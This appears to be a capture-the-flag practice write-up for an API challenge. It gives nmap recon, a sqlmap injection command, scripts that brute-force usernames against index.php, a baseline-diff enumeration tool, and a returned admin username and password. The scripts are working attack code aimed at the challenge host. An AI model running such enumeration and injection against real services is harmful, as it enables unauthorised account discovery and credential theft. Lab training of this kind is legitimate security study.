# ICC Athens Practice
## API
We found a nice target where some backend API communication is happening behind the scenes at
http://challenge-01.icsc.cybexer.io:8080.
Sometimes it is possible to extract valuable information by tampering with some parameters.
A dictionary attack may be used against the index.php script, and a web proxy seems to be the best tool for this job.
QUESTION
Can you reverse engineer the messages and extract some information from this endpoint?
### RECON
#### nmap
```bash
$ nmap challenge-01.icsc.cybexer.io -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-26 12:01 EDT
Nmap scan report for challenge-01.icsc.cybexer.io (35.157.25.221)
Host is up (0.12s latency).
rDNS record for 35.157.25.221: ec2-35-157-25-221.eu-central-1.compute.amazonaws.com
Not shown: 991 filtered ports
PORT     STATE  SERVICE
81/tcp   open   hosts2-ns
82/tcp   open   xfer
83/tcp   open   mit-ml-dev
2222/tcp open   EtherNetIP-1
2251/tcp open   dif-port
2260/tcp closed apc-2260
2288/tcp closed netml
8080/tcp open   http-proxy
8888/tcp open   sun-answerbook
```
#### sun-answerbook exploit
Might be useful? Worth exploring IMO: https://www.exploit-db.com/exploits/20144
Caveat: the scan above ran without `-sV`, so the SERVICE column is only nmap's port-number lookup from its nmap-services file. "sun-answerbook" on 8888/tcp is therefore not evidence that AnswerBook is actually listening; run `nmap -sV -p 8888 challenge-01.icsc.cybexer.io` (or just curl the port) before spending time on that exploit.
### username wordlist
https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt
### bruteforce py script
```python
#!/usr/bin/env python3
import sys
import requests

# Pull the SecLists first-name wordlist straight from GitHub
users = requests.get('https://raw.githubusercontent.com/danielmiessler/SecLists/master/Usernames/Names/names.txt')
for u in users.text.split('\n'):
    if not u:
        continue  # skip blank lines in the wordlist
    # The endpoint answers "No user ..." for unknown names and a user record for a hit
    res = requests.post(f'http://challenge-01.icsc.cybexer.io:8080?user={u}')
    print(f'Trying with user {u}, response: {res.text}')
    if not res.text.startswith('No user'):
        sys.exit()  # first non-"No user" response is the hit; stop here
```
### fuzz with wfuzz and python
```python
import wfuzz


def main():
    # Send each line of names.txt as the POST body "user=<name>" to index.php,
    # hide 404s, and stop at the first response that is not the "No user found" message
    for r in wfuzz.fuzz(url="http://challenge-01.icsc.cybexer.io:8080/index.php",
                        postdata="user=FUZZ",
                        hc=[404],
                        payloads=[("file", dict(fn="names.txt"))]):
        if "No user found" not in r.content:
            print(r.content)
            return


if __name__ == "__main__":
    main()
```
### Inject w/sqlmap
```bash
$ sqlmap -u 'http://challenge-01.icsc.cybexer.io:8080?user=admin' -p "user" --level 5 --threads 10
```
A second, much shorter wordlist is also worth a run:
https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt

A hit (here `administrator`) comes back as the raw response below; the `<br>` tags are part of the body the endpoint returns:
```
Username: administrator<br>Password: terminator008<br>UserID: 1<br>IP: 127.0.0.1<br>Documentroot: /virtualadmin<br>
```
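The two enumeration scripts above both hard-code the "No user" string as the miss signal, and the hit above is a `Key: value<br>` record that still has to be read by hand. The script below is an added example for this writeup, not code from the challenge or its author: it learns the miss response from a few random usernames (so the oracle does not break if the wording changes), flags any candidate whose body differs, and parses the record into a dict. It assumes the endpoint takes a form-encoded POST of `user=<name>` to `index.php` as in the wfuzz section; `http_responder`, `fake_responder`, `FAKE_RECORD` and `SAMPLE_WORDLIST` are my own names, and the fake responder and wordlist are constructed so the script runs offline.

```python
#!/usr/bin/env python3
"""Baseline-diff user enumeration for a `user=` parameter, plus a parser for the
`Key: value<br>` record the endpoint returns on a hit.

Added example for this writeup, not challenge code. Assumes a form-encoded POST of
user=<name> to index.php; the fake responder and sample wordlist are constructed.
"""
import re
import secrets
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List, Set, Tuple

# A responder maps a candidate username to the raw response body.
Responder = Callable[[str], str]

# Fields in the hit record are separated by <br> (newlines tolerated too).
RECORD_FIELD = re.compile(r"<br\s*/?>|\r?\n")


def parse_record(body: str) -> Dict[str, str]:
    """Turn 'Username: administrator<br>Password: x<br>' into {'Username': ..., 'Password': ...}."""
    fields: Dict[str, str] = {}
    for part in RECORD_FIELD.split(body):
        if ":" not in part:
            continue  # trailing empty piece, or a body that is not a record at all
        key, value = part.split(":", 1)
        fields[key.strip()] = value.strip()
    return fields


def http_responder(url: str, timeout: float = 10.0) -> Responder:
    """Responder that POSTs user=<name> to `url` (assumed request shape, see lead-in)."""
    def respond(user: str) -> str:
        data = urllib.parse.urlencode({"user": user}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    return respond


def baseline(respond: Responder, probes: int = 3) -> str:
    """Learn the 'unknown user' body from random names instead of hard-coding it.
    If those bodies are not identical a differing response is no longer a hit
    signal (dynamic content, rate limiting, WAF), so refuse to continue."""
    seen: Set[str] = {respond("zz" + secrets.token_hex(8)) for _ in range(probes)}
    if len(seen) != 1:
        raise RuntimeError("unstable baseline: unknown users get differing responses")
    return seen.pop()


def enumerate_users(respond: Responder, wordlist: Iterable[str],
                    stop_on_first: bool = True) -> List[Tuple[str, Dict[str, str]]]:
    """Return (username, parsed record) for every name whose body differs from baseline."""
    miss = baseline(respond)
    hits: List[Tuple[str, Dict[str, str]]] = []
    for name in wordlist:
        name = name.strip()
        if not name:
            continue  # blank wordlist lines would otherwise probe user= itself
        body = respond(name)
        if body == miss:
            continue
        hits.append((name, parse_record(body)))
        if stop_on_first:
            break
    return hits


# --- constructed stand-in for the challenge endpoint so this runs offline ---
FAKE_RECORD = ("Username: administrator<br>Password: terminator008<br>UserID: 1<br>"
               "IP: 127.0.0.1<br>Documentroot: /virtualadmin<br>")


def fake_responder(user: str) -> str:
    """Mimics the endpoint: one valid user, 'No user found' for everything else."""
    return FAKE_RECORD if user == "administrator" else "No user found"


SAMPLE_WORDLIST = ["root", "admin", "", "administrator", "guest"]  # constructed


if __name__ == "__main__":
    # For the real target swap in:
    # http_responder("http://challenge-01.icsc.cybexer.io:8080/index.php")
    for user, record in enumerate_users(fake_responder, SAMPLE_WORDLIST):
        print(f"[+] {user}: {record}")
```

Against the live box, pass `http_responder(...)` in place of `fake_responder` and feed it the wordlist file; `stop_on_first=False` keeps going after the first hit, which matters when more than one account is valid.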